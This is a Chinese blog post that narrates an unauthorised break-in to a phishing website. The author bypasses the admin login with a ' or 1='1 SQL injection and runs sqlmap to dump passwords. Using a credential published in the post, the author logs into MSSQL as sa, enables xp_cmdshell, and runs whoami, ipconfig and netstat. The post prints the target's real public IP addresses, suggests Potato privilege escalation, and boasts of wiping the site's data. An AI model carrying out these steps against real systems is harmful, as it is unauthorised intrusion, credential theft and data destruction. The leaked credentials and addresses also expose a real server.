弱智钓鱼渗透实战
前言
今天在群里水群,偶然间发现一个钓鱼站点,随便搞搞看。
首先看一下action地址,进去转了一圈,发现不是后台,没意思。
接着就上扫描器,扫了一圈啥也没有。
最后扫下端口,有惊喜了,看这个界面,基本就是弱智后台,直接万能密码淦。
' or 1='1
' or 1='1
好的进了后台了,然后找到了真实账号密码。
903998876
li158669
好的,进了后台就完了?当然是想办法拿到shell再说,后台肯定有注入,先拿去sqlmap跑一下POST注入。
果然有,直接就出来了,问题就在于,居然时间盲注,太费时间了。
扫端口,发现开放1433,就想着sa进去,索性跑一下密码。
sqlmap -r sql.txt --passwords
在漫长的盲注等待期间,我试了一下上面拿到的密码尝试了一下。
sa/li158669
于是就进去了,服务器没开xp_cmdshell,所以我们帮他开启一下。
exec sp_configure 'show advanced options',1
reconfigure
exec sp_configure 'xp_cmdshell',1
reconfigure
好了能执行cmd命令了,首先whoami
一下。
nt service\mssqlserver
再ipconfig
一下
Windows IP 配置
主机名 . . . . . . . . . . . . . : ebs-48474
主 DNS 后缀 . . . . . . . . . . . :
节点类型 . . . . . . . . . . . . : 混合
IP 路由已启用 . . . . . . . . . . : 否
WINS 代理已启用 . . . . . . . . . : 否
以太网适配器 本地连接 2:
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Red Hat VirtIO Ethernet Adapter #2
物理地址. . . . . . . . . . . . . : 52-54-00-97-D6-EC
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
本地链接 IPv6 地址. . . . . . . . : fe80::396f:c860:10bf:a68e%13(首选)
IPv4 地址 . . . . . . . . . . . . : 192.168.223.179(首选)
子网掩码 . . . . . . . . . . . . : 255.255.0.0
默认网关. . . . . . . . . . . . . :
DHCPv6 IAID . . . . . . . . . . . : 307385344
DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-25-4F-3B-5C-52-54-00-9C-3D-19
DNS 服务器 . . . . . . . . . . . : fec0:0:0:ffff::1%1
fec0:0:0:ffff::2%1
fec0:0:0:ffff::3%1
TCPIP 上的 NetBIOS . . . . . . . : 已启用
以太网适配器 本地连接:
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Red Hat VirtIO Ethernet Adapter
物理地址. . . . . . . . . . . . . : 52-54-00-9C-3D-19
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
本地链接 IPv6 地址. . . . . . . . : fe80::c111:6e76:9e15:cc4f%11(首选)
IPv4 地址 . . . . . . . . . . . . : 211.149.223.179(首选)
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 211.149.223.1
DHCPv6 IAID . . . . . . . . . . . : 240276480
DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-25-4F-3B-5C-52-54-00-9C-3D-19
DNS 服务器 . . . . . . . . . . . : 223.5.5.5
114.114.114.114
TCPIP 上的 NetBIOS . . . . . . . : 已启用
隧道适配器 isatap.{F62CBCB3-434F-456D-B57D-E07EF3C5621C}:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
隧道适配器 isatap.{E002F1A8-A64F-4703-83CB-4B5D8E6C22ED}:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #2
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
隧道适配器 6TO4 Adapter:
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft 6to4 Adapter
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
IPv6 地址 . . . . . . . . . . . . : 2002:d395:dfb3::d395:dfb3(首选)
默认网关. . . . . . . . . . . . . :
DNS 服务器 . . . . . . . . . . . : 223.5.5.5
114.114.114.114
TCPIP 上的 NetBIOS . . . . . . . : 已禁用
再netstat -an
一下
活动连接
协议 本地地址 外部地址 状态
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:987 0.0.0.0:0 LISTENING
TCP 0.0.0.0:988 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING
TCP 0.0.0.0:33890 0.0.0.0:0 LISTENING
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49157 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49291 0.0.0.0:0 LISTENING
TCP 192.168.223.179:139 0.0.0.0:0 LISTENING
TCP 211.149.223.179:139 0.0.0.0:0 LISTENING
我对服务器并不感兴趣,就懒得上他服务器玩玩了,远程桌面应该就是端口就是33890。
如果需要提权,请自行想办法,建议用Potato提权吧,留给愿意折腾的老哥去吧。
后记
既然来过了,顺带清空了后台记录的账号密码。
“轻轻地我走了,正如我轻轻地来,挥一挥手,不带走一片云彩”
最后一次更新于2020-02-23
0 条评论